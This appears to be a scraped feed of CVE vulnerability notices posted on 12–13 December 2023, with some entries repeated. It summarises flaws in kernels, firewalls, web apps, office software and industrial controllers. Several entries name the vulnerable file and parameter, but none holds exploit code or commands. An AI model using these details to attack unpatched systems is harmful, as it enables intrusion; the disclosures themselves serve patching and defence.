🚨 CVE-2022-22942The vmwgfx driver contains a local privilege escalation vulnerability that allows unprivileged users to gain access to files opened by other processes on the system through a dangling 'file' pointer.🎖@cveNotify |
|
| 2023-12-13 08:17:21 |
🚨 CVE-2023-47536An improper access control vulnerability [CWE-284] in FortiOS version 7.2.0, version 7.0.13 and below, version 6.4.14 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below may allow a remote unauthenticated attacker to bypass the firewall deny geolocalisation policy via timing the bypass with a GeoIP database update.🎖@cveNotify |
|
| 2023-12-13 08:17:17 |
🚨 CVE-2023-6394A flaw was found in Quarkus. This issue occurs when receiving a request over websocket with no role-based permission specified on the GraphQL operation, Quarkus processes the request without authentication despite the endpoint being secured. This can allow an attacker to access information and functionality outside of normal granted API permissions.🎖@cveNotify |
|
| 2023-12-13 08:17:16 |
🚨 CVE-2023-6238A buffer overflow vulnerability was found in the NVM Express (NVMe) driver in the Linux kernel. An unprivileged user could specify a small meta buffer and let the device perform larger Direct Memory Access (DMA) into the same buffer, overwriting unrelated kernel memory, causing random kernel crashes and memory corruption.🎖@cveNotify |
|
| 2023-12-13 08:17:15 |
🚨 CVE-2023-4956A flaw was found in Quay. Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they intend to click on the top-level page. During the pentest, it has been detected that the config-editor page is vulnerable to clickjacking. This flaw allows an attacker to trick an administrator user into clicking on buttons on the config-editor panel, possibly reconfiguring some parts of the Quay instance.🎖@cveNotify |
|
| 2023-12-13 08:17:12 |
🚨 CVE-2023-4910A flaw was found In 3Scale Admin Portal. If a user logs out from the personal tokens page and then presses the back button in the browser, the tokens page is rendered from the browser cache.🎖@cveNotify |
|
| 2023-12-13 08:17:11 |
🚨 CVE-2023-5824Squid is vulnerable to Denial of Service attack against HTTP and HTTPS clients due to an Improper Handling of Structural Elements bug.🎖@cveNotify |
|
| 2023-12-13 08:17:10 |
🚨 CVE-2023-46847Squid is vulnerable to a Denial of Service, where a remote attacker can perform buffer overflow attack by writing up to 2 MB of arbitrary data to heap memory when Squid is configured to accept HTTP Digest Authentication.🎖@cveNotify |
|
| 2023-12-13 07:17:18 |
🚨 CVE-2023-41673An improper authorization vulnerability [CWE-285] in Fortinet FortiADC version 7.4.0 and before 7.2.2 may allow a low privileged user to read or backup the full system configuration via HTTP or HTTPS requests.🎖@cveNotify |
|
| 2023-12-13 07:17:11 |
🚨 CVE-2022-27488A cross-site request forgery (CSRF) in Fortinet FortiVoiceEnterprise version 6.4.x, 6.0.x, FortiSwitch version 7.0.0 through 7.0.4, 6.4.0 through 6.4.10, 6.2.0 through 6.2.7, 6.0.x, FortiMail version 7.0.0 through 7.0.3, 6.4.0 through 6.4.6, 6.2.x, 6.0.x FortiRecorder version 6.4.0 through 6.4.2, 6.0.x, 2.7.x, 2.6.x, FortiNDR version 1.x.x allows a remote unauthenticated attacker to execute commands on the CLI via tricking an authenticated administrator to execute malicious GET requests.🎖@cveNotify |
|
| 2023-12-13 07:17:10 |
🚨 CVE-2020-27792A heap-based buffer overwrite vulnerability was found in GhostScript's lp8000_print_page() function in the gdevlp8k.c file. This flaw allows an attacker to trick a user into opening a crafted PDF file, triggering the heap buffer overflow that could lead to memory corruption or a denial of service.🎖@cveNotify |
|
| 2023-12-13 06:17:10 |
🚨 CVE-2020-27792A heap-based buffer overwrite vulnerability was found in GhostScript's lp8000_print_page() function in the gdevlp8k.c file. This flaw allows an attacker to trick a user into opening a crafted PDF file, triggering the heap buffer overflow that could lead to memory corruption or a denial of service.🎖@cveNotify |
|
| 2023-12-13 05:17:27 |
🚨 CVE-2022-33324Improper Resource Shutdown or Release vulnerability in Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU Firmware versions "32" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU Firmware versions "65" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R08/16/32/120SFCPU Firmware versions "29" and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R12CCPU-V Firmware versions "17" and prior, Mitsubishi Electric Corporation MELSEC iQ-L Series L04/08/16/32HCPU all versions and Mitsubishi Electric Corporation MELIPC Series MI5122-VW all versions allows a remote unauthenticated attacker to cause a Denial of Service condition in Ethernet communication on the module by sending specially crafted packets. A system reset of the module is required for recovery.🎖@cveNotify |
|
| 2023-12-13 04:17:21 |
🚨 CVE-2023-5379A flaw was found in Undertow. When an AJP request is sent that exceeds the max-header-size attribute in ajp-listener, JBoss EAP is marked in an error state by mod_cluster in httpd, causing JBoss EAP to close the TCP connection without returning an AJP response. This happens because mod_proxy_cluster marks the JBoss EAP instance as an error worker when the TCP connection is closed from the backend after sending the AJP request without receiving an AJP response, and stops forwarding. This issue could allow a malicious user could to repeatedly send requests that exceed the max-header-size, causing a Denial of Service (DoS).🎖@cveNotify |
|
| 2023-12-13 03:17:20 |
🚨 CVE-2023-6186Insufficient macro permission validation of The Document Foundation LibreOffice allows an attacker to execute built-in macros without warning.In affected versions LibreOffice supports hyperlinks with macro or similar built-in command targets that can be executed when activated without warning the user.🎖@cveNotify |
|
| 2023-12-13 03:17:14 |
🚨 CVE-2023-6185Improper Input Validation vulnerability in GStreamer integration of The Document Foundation LibreOffice allows an attacker to execute arbitrary GStreamer plugins.In affected versions the filename of the embedded video is not sufficiently escaped when passed to GStreamer enabling an attacker to run arbitrary gstreamer plugins depending on what plugins are installed on the target system.🎖@cveNotify |
|
| 2023-12-13 03:17:13 |
🚨 CVE-2023-42917A memory corruption vulnerability was addressed with improved locking. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2023-12-13 03:17:12 |
🚨 CVE-2023-42916An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2023-12-13 02:17:10 |
🚨 CVE-2023-6648A vulnerability, which was classified as critical, was found in PHPGurukul Nipah Virus Testing Management System 1.0. This affects an unknown part of the file password-recovery.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247341 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-13 01:17:23 |
🚨 CVE-2023-45866Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue.🎖@cveNotify |
|
| 2023-12-13 01:17:17 |
🚨 CVE-2023-42917A memory corruption vulnerability was addressed with improved locking. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2023-12-13 01:17:16 |
🚨 CVE-2023-5344Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1969.🎖@cveNotify |
|
| 2023-12-13 01:17:15 |
🚨 CVE-2020-19190Buffer Overflow vulnerability in _nc_find_entry in tinfo/comp_hash.c:70 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.🎖@cveNotify |
|
| 2023-12-13 01:17:11 |
🚨 CVE-2020-19188Buffer Overflow vulnerability in fmt_entry function in progs/dump_entry.c:1116 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.🎖@cveNotify |
|
| 2023-12-13 01:17:10 |
🚨 CVE-2020-19185Buffer Overflow vulnerability in one_one_mapping function in progs/dump_entry.c:1373 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.🎖@cveNotify |
|
| 2023-12-13 00:17:20 |
🚨 CVE-2023-48412In private_handle_t of mali_gralloc_buffer.h, there is a possible information leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-13 00:17:13 |
🚨 CVE-2023-42916An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2023-12-13 00:17:12 |
🚨 CVE-2023-46818An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.🎖@cveNotify |
|
| 2023-12-12 23:47:11 |
🚨 CVE-2023-48409In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/mali_kbase_core_linux.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-12 23:47:10 |
🚨 CVE-2023-48397In Init of protocolcalladapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-12 23:17:10 |
🚨 CVE-2023-3517Hitachi Vantara Pentaho Data Integration & Analytics versions before 9.5.0.1 and 9.3.0.5, including 8.3.x does not restrict JNDI identifiers during the creation of XActions, allowing control of system level data sources.🎖@cveNotify |
|
| 2023-12-12 22:47:10 |
🚨 CVE-2023-5058Improper Input Validation in the processing of user-supplied splash screen during system boot in Phoenix SecureCore™ Technology™ 4 potentially allows denial-of-service attacks or arbitrary code execution.🎖@cveNotify |
|
| 2023-12-12 22:17:16 |
🚨 CVE-2023-6710A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page. The impact of this vulnerability is considered as Low, as the cluster_manager URL should not be exposed outside and is protected by user/password.🎖@cveNotify |
|
| 2023-12-12 22:17:15 |
🚨 CVE-2023-5764A template injection flaw was found in Ansible where a user's controller internal templating operations may remove the unsafe designation from template data. This issue could allow an attacker to use a specially crafted file to introduce code injection when supplying templating data.🎖@cveNotify |
|
| 2023-12-12 22:17:11 |
🚨 CVE-2023-5379A flaw was found in Undertow. When an AJP request is sent that exceeds the max-header-size attribute in ajp-listener, JBoss EAP is marked in an error state by mod_cluster in httpd, causing JBoss EAP to close the TCP connection without returning an AJP response. This happens because mod_proxy_cluster marks the JBoss EAP instance as an error worker when the TCP connection is closed from the backend after sending the AJP request without receiving an AJP response, and stops forwarding. This issue could allow a malicious user could to repeatedly send requests that exceed the max-header-size, causing a Denial of Service (DoS).🎖@cveNotify |
|
| 2023-12-12 22:17:10 |
🚨 CVE-2023-5557A flaw was found in the tracker-miners package. A weakness in the sandbox allows a maliciously-crafted file to execute code outside the sandbox if the tracker-extract process has first been compromised by a separate vulnerability.🎖@cveNotify |
|
| 2023-12-12 21:47:10 |
🚨 CVE-2023-42579Improper usage of insecure protocol (i.e. HTTP) in SogouSDK of Chinese Samsung Keyboard prior to versions 5.3.70.1 in Android 11, 5.4.60.49, 5.4.85.5, 5.5.00.58 in Android 12, and 5.6.00.52, 5.6.10.42, 5.7.00.45 in Android 13 allows adjacent attackers to access keystroke data using Man-in-the-Middle attack.🎖@cveNotify |
|
| 2023-12-12 21:17:23 |
🚨 CVE-2023-28527IBM Informix Dynamic Server 12.10 and 14.10 cdr is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow a local user to cause a segmentation fault. IBM X-Force ID: 251206.🎖@cveNotify |
|
| 2023-12-12 21:17:16 |
🚨 CVE-2020-16224In Patient Information Center iX (PICiX) Versions C.02, C.03, the software parses a formatted message or structure but does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data, causing the application on the surveillance station to restart.🎖@cveNotify |
|
| 2023-12-12 21:17:15 |
🚨 CVE-2020-16220In Patient Information Center iX (PICiX) Versions C.02, C.03, PerformanceBridge Focal Point Version A.01, the product receives input that is expected to be well-formed (i.e., to comply with a certain syntax) but it does not validate or incorrectly validates that the input complies with the syntax, causing the certificate enrollment service to crash. It does not impact monitoring but prevents new devices from enrolling.🎖@cveNotify |
|
| 2023-12-12 21:17:11 |
🚨 CVE-2020-16228In Patient Information Center iX (PICiX) Versions C.02 and C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX550, MX750, MX850, and IntelliVue X3 Versions N and prior, the software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a compromised certificate.🎖@cveNotify |
|
| 2023-12-12 21:17:10 |
🚨 CVE-2020-16214In Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, the software saves user-provided information into a comma-separated value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software.🎖@cveNotify |
|
| 2023-12-12 20:47:27 |
🚨 CVE-2023-49279Umbraco is an ASP.NET content management system (CMS). Starting in version 7.0.0 and prior to versions 7.15.11, 8.18.9, 10.7.0, 11.5.0, and 12.2.0, a user with access to the backoffice can upload SVG files that include scripts. If the user can trick another user to load the media directly in a browser, the scripts can be executed. Versions 7.15.11, 8.18.9, 10.7.0, 11.5.0, and 12.2.0 contain a patch for this issue. Some workarounds are available. Implement the server side file validation or serve all media from an different host (e.g cdn) than where Umbraco is hosted.🎖@cveNotify |
|
| 2023-12-12 20:47:26 |
🚨 CVE-2023-49274Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, a user enumeration attack is possible when SMTP is not set up correctly, but reset password is enabled. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue.🎖@cveNotify |
|
| 2023-12-12 20:47:22 |
🚨 CVE-2023-34064Workspace ONE Launcher contains a Privilege Escalation Vulnerability. A malicious actor with physical access to Workspace ONE Launcher could utilize the Edge Panel feature to bypass setup to gain access to sensitive information.🎖@cveNotify |
|
| 2023-12-12 20:47:21 |
🚨 CVE-2023-49273Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.4, users with low privileges (Editor, etc.) are able to access some unintended endpoints. Versions 8.18.10, 10.8.1, and 12.3.4 contain a patch for this issue.🎖@cveNotify |
|
| 2023-12-12 20:17:23 |
🚨 CVE-2023-6615A vulnerability, which was classified as problematic, has been found in Typecho 1.2.1. Affected by this issue is some unknown functionality of the file /admin/manage-users.php. The manipulation of the argument page leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-247250 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-12 20:17:17 |
🚨 CVE-2023-6614A vulnerability classified as problematic was found in Typecho 1.2.1. Affected by this vulnerability is an unknown functionality of the file /admin/manage-pages.php of the component Page Handler. The manipulation leads to backdoor. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247249 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-12 20:17:16 |
🚨 CVE-2023-23372A cross-site scripting (XSS) vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to inject malicious code via a network.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2425 build 20230609 and laterQTS 5.1.0.2444 build 20230629 and laterQTS 4.5.4.2467 build 20230718 and laterQuTS hero h5.1.0.2424 build 20230609 and laterQuTS hero h5.0.1.2515 build 20230907 and laterQuTS hero h4.5.4.2476 build 20230728 and later🎖@cveNotify |
|
| 2023-12-12 20:17:11 |
🚨 CVE-2023-35618Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-12 20:17:10 |
🚨 CVE-2023-42325Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page.🎖@cveNotify |
|
| 2023-12-12 19:47:16 |
🚨 CVE-2023-6581A vulnerability has been found in D-Link DAR-7000 up to 20231126 and classified as critical. This vulnerability affects unknown code of the file /user/inc/workidajax.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-12 19:47:11 |
🚨 CVE-2023-41171NetScout nGeniusONE 6.3.4 build 2298 allows a Stored Cross-Site scripting vulnerability (issue 3 of 4).🎖@cveNotify |
|
| 2023-12-12 19:47:10 |
🚨 CVE-2023-6459Mattermost is grouping calls in the /metrics endpoint by id and reports that id in the response. Since this id is the channelID, the public /metrics endpoint is revealing channelIDs.🎖@cveNotify |
|
| 2023-12-12 19:17:10 |
🚨 CVE-2020-16212In Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, the product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. The application on the surveillance station operates in kiosk mode, which is vulnerable to local breakouts that could allow an attacker with physical access to escape the restricted environment with limited privileges.🎖@cveNotify |
|
| 2023-12-12 18:47:18 |
🚨 CVE-2023-49493DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the v parameter at selectimages.php.🎖@cveNotify |
|
| 2023-12-12 18:47:17 |
🚨 CVE-2023-6273Permission management vulnerability in the module for disabling Sound Booster. Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2023-12-12 14:47:20 |
🚨 CVE-2023-46736EspoCRM is an Open Source CRM (Customer Relationship Management) software. In affected versions there is Server-Side Request Forgery (SSRF) vulnerability via the upload image from url api. Users who have access to `the /Attachment/fromImageUrl` endpoint can specify URL to point to an internal host. Even though there is check for content type, it can be bypassed by redirects in some cases. This SSRF can be leveraged to disclose internal information (in some cases), target internal hosts and bypass firewalls. This vulnerability has been addressed in commit `c536cee63` which is included in release version 8.0.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-12 14:47:16 |
🚨 CVE-2023-4015A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.On an error when building a nftables rule, deactivating immediate expressions in nft_immediate_deactivate() can lead unbinding the chain and objects be deactivated but later used.We recommend upgrading past commit 0a771f7b266b02d262900c75f1e175c7fe76fec2.🎖@cveNotify |
|
| 2023-12-12 14:47:15 |
🚨 CVE-2023-31248Linux Kernel nftables Use-After-Free Local Privilege Escalation Vulnerability; `nft_chain_lookup_byid()` failed to check whether a chain was active and CAP_NET_ADMIN is in any user or network namespace🎖@cveNotify |
|
| 2023-12-12 14:47:14 |
🚨 CVE-2023-30589The llhttp parser in the http module in Node v20.2.0 does not strictly use the CRLF sequence to delimit HTTP requests. This can lead to HTTP Request Smuggling (HRS).The CR character (without LF) is sufficient to delimit HTTP header fields in the llhttp parser. According to RFC7230 section 3, only the CRLF sequence should delimit each header-field. This impacts all Node.js active versions: v16, v18, and, v20🎖@cveNotify |
|
| 2023-12-12 14:17:52 |
🚨 CVE-2023-6193quiche v. 0.15.0 through 0.19.0 was discovered to be vulnerable to unbounded queuing of path validation messages, which could lead to excessive resource consumption.QUIC path validation (RFC 9000 Section 8.2) requires that the recipient of a PATH_CHALLENGE frame responds by sending a PATH_RESPONSE. An unauthenticated remote attacker can exploit the vulnerability by sending PATH_CHALLENGE frames and manipulating the connection (e.g. by restricting the peer's congestion window size) so that PATH_RESPONSE frames can only be sent at the slower rate than they are received; leading to storage of path validation data in an unbounded queue. Quiche versions greater than 0.19.0 address this problem.🎖@cveNotify |
|
| 2023-12-12 14:17:51 |
🚨 CVE-2023-49992Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Overflow via the function RemoveEnding at dictionary.c.🎖@cveNotify |
|
| 2023-12-12 14:17:50 |
🚨 CVE-2023-49991Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Underflow via the function CountVowelPosition at synthdata.c.🎖@cveNotify |
|
| 2023-12-12 14:17:47 |
🚨 CVE-2023-49990Espeak-ng 1.52-dev was discovered to contain a buffer-overflow via the function SetUpPhonemeTable at synthdata.c.🎖@cveNotify |
|
| 2023-12-12 14:17:46 |
🚨 CVE-2023-49282msgraph-sdk-php is the Microsoft Graph Library for PHP. The Microsoft Graph PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. The phpInfo function exposes system information. The vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. This vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. The combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data. This problem has been patched in versions 1.109.1 and 2.0.0-RC5. If an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds: delete the `vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php` file, remove access to the `/vendor` directory, or disable the phpinfo function.🎖@cveNotify |
|
| 2023-12-12 14:17:45 |
🚨 CVE-2021-33069Improper resource shutdown or release in firmware for some Intel(R) SSD, Intel(R) SSD DC, Intel(R) Optane(TM) SSD and Intel(R) Optane(TM) SSD DC may allow a privileged user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2023-12-12 13:17:33 |
🚨 CVE-2020-12615An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. When adding the Add Admin token to a process, and specifying that it runs at medium integrity with the user owning the process, this security token can be stolen and applied to arbitrary processes.🎖@cveNotify |
|
| 2023-12-12 12:17:31 |
🚨 CVE-2020-25236A vulnerability has been identified in LOGO! 12/24RCE (All versions), LOGO! 12/24RCEo (All versions), LOGO! 230RCE (All versions), LOGO! 230RCEo (All versions), LOGO! 24CE (All versions), LOGO! 24CEo (All versions), LOGO! 24RCE (All versions), LOGO! 24RCEo (All versions), SIPLUS LOGO! 12/24RCE (All versions), SIPLUS LOGO! 12/24RCEo (All versions), SIPLUS LOGO! 230RCE (All versions), SIPLUS LOGO! 230RCEo (All versions), SIPLUS LOGO! 24CE (All versions), SIPLUS LOGO! 24CEo (All versions), SIPLUS LOGO! 24RCE (All versions), SIPLUS LOGO! 24RCEo (All versions). The control logic (CL) the LOGO! 8 executes could be manipulated in a way that could cause the deviceexecuting the CL to improperly handle the manipulation and crash. After successful execution of the attack, the device needs to be manually reset.🎖@cveNotify |
|
| 2023-12-12 11:17:10 |
🚨 CVE-2023-6727Mattermost fails to perform correct authorization checks when creating a playbook action, allowing users without access to the playbook to create playbook actions. If the playbook action created is to post a message in a channel based on specific keywords in a post, some playbook information, like the name, can be leaked.🎖@cveNotify |
|
| 2023-12-12 10:17:42 |
🚨 CVE-2023-5557A flaw was found in the tracker-miners package. A weakness in the sandbox allows a maliciously-crafted file to execute code outside the sandbox if the tracker-extract process has first been compromised by a separate vulnerability.🎖@cveNotify |
|
| 2023-12-12 10:17:36 |
🚨 CVE-2023-30757A vulnerability has been identified in Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions), Totally Integrated Automation Portal (TIA Portal) V19 (All versions). The know-how protection feature in affected products does not properly update the encryption of existing program blocks when a project file is updated.This could allow attackers with access to the project file to recover previous - yet unprotected - versions of the project without the knowledge of the know-how protection password.🎖@cveNotify |
|
| 2023-12-12 10:17:35 |
🚨 CVE-2022-36361A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA1) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA1) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA1) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA1) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA1) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA1) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA1) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA1) (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA1) (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA1) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA1) (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA1) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA1) (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA1) (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA1) (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA1) (All versions). Affected devices do not properly validate the structure of TCP packets in several methods. This could allow an attacker to cause buffer overflows, get control over the instruction counter and run custom code.🎖@cveNotify |
|
| 2023-12-12 10:17:34 |
🚨 CVE-2020-25236A vulnerability has been identified in LOGO! 12/24RCE (6ED1052-1MD08-0BA1) (All versions), LOGO! 12/24RCEo (6ED1052-2MD08-0BA1) (All versions), LOGO! 230RCE (6ED1052-1FB08-0BA1) (All versions), LOGO! 230RCEo (6ED1052-2FB08-0BA1) (All versions), LOGO! 24CE (6ED1052-1CC08-0BA1) (All versions), LOGO! 24CEo (6ED1052-2CC08-0BA1) (All versions), LOGO! 24RCE (6ED1052-1HB08-0BA1) (All versions), LOGO! 24RCEo (6ED1052-2HB08-0BA1) (All versions), SIPLUS LOGO! 12/24RCE (6AG1052-1MD08-7BA1) (All versions), SIPLUS LOGO! 12/24RCEo (6AG1052-2MD08-7BA1) (All versions), SIPLUS LOGO! 230RCE (6AG1052-1FB08-7BA1) (All versions), SIPLUS LOGO! 230RCEo (6AG1052-2FB08-7BA1) (All versions), SIPLUS LOGO! 24CE (6AG1052-1CC08-7BA1) (All versions), SIPLUS LOGO! 24CEo (6AG1052-2CC08-7BA1) (All versions), SIPLUS LOGO! 24RCE (6AG1052-1HB08-7BA1) (All versions), SIPLUS LOGO! 24RCEo (6AG1052-2HB08-7BA1) (All versions). The control logic (CL) the LOGO! 8 executes could be manipulated in a way that could cause the deviceexecuting the CL to improperly handle the manipulation and crash. After successful execution of the attack, the device needs to be manually reset.🎖@cveNotify |
|
| 2023-12-12 09:17:32 |
🚨 CVE-2023-41835When a Multipart request is performed but some of the fields exceed the maxStringLength limit, the upload files will remain in struts.multipart.saveDir even if the request has been denied.Users are recommended to upgrade to versions Struts 2.5.32 or 6.1.2.2 or Struts 6.3.0.1 or greater, which fixe this issue.🎖@cveNotify |
|
| 2023-12-12 09:17:31 |
🚨 CVE-2023-39075Renault Zoe EV 2021 automotive infotainment system versions 283C35202R to 283C35519R (builds 11.10.2021 to 16.01.2023) allows attackers to crash the infotainment system by sending arbitrary USB data via a USB device.🎖@cveNotify |
|
| 2023-12-12 08:17:11 |
🚨 CVE-2023-48642Archer Platform 6.x before 6.13 P2 (6.13.0.2) contains an authenticated HTML content injection vulnerability. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.14 (6.14.0) is also a fixed release.🎖@cveNotify |
|
| 2023-12-12 08:17:10 |
🚨 CVE-2022-48615An improper access control vulnerability exists in a Huawei datacom product. Attackers can exploit this vulnerability to obtain partial device information.🎖@cveNotify |
|
| 2023-12-12 05:17:10 |
🚨 CVE-2023-5824Squid is vulnerable to Denial of Service attack against HTTP and HTTPS clients due to an Improper Handling of Structural Elements bug.🎖@cveNotify |
|
| 2023-12-12 04:17:10 |
🚨 CVE-2023-6709Improper Neutralization of Special Elements Used in a Template Engine in GitHub repository mlflow/mlflow prior to 2.9.2.🎖@cveNotify |
|
| 2023-12-12 02:17:23 |
🚨 CVE-2023-49581SAP GUI for Windows and SAP GUI for Java allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to write data to a database table. By doing so the attacker could increase response times of the AS ABAP, leading to mild impact on availability.🎖@cveNotify |
|
| 2023-12-12 02:17:17 |
🚨 CVE-2023-49580SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP.🎖@cveNotify |
|
| 2023-12-12 02:17:16 |
🚨 CVE-2023-46219When saving HSTS data to an excessively long file name, curl could end upremoving all contents, making subsequent requests using that file unaware ofthe HSTS status they should otherwise use.🎖@cveNotify |
|
| 2023-12-12 02:17:15 |
🚨 CVE-2023-6186Insufficient macro permission validation of The Document Foundation LibreOffice allows an attacker to execute built-in macros without warning.In affected versions LibreOffice supports hyperlinks with macro or similar built-in command targets that can be executed when activated without warning the user.🎖@cveNotify |
|
| 2023-12-12 02:17:11 |
🚨 CVE-2023-49242Free broadcast vulnerability in the running management module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-12-12 02:17:10 |
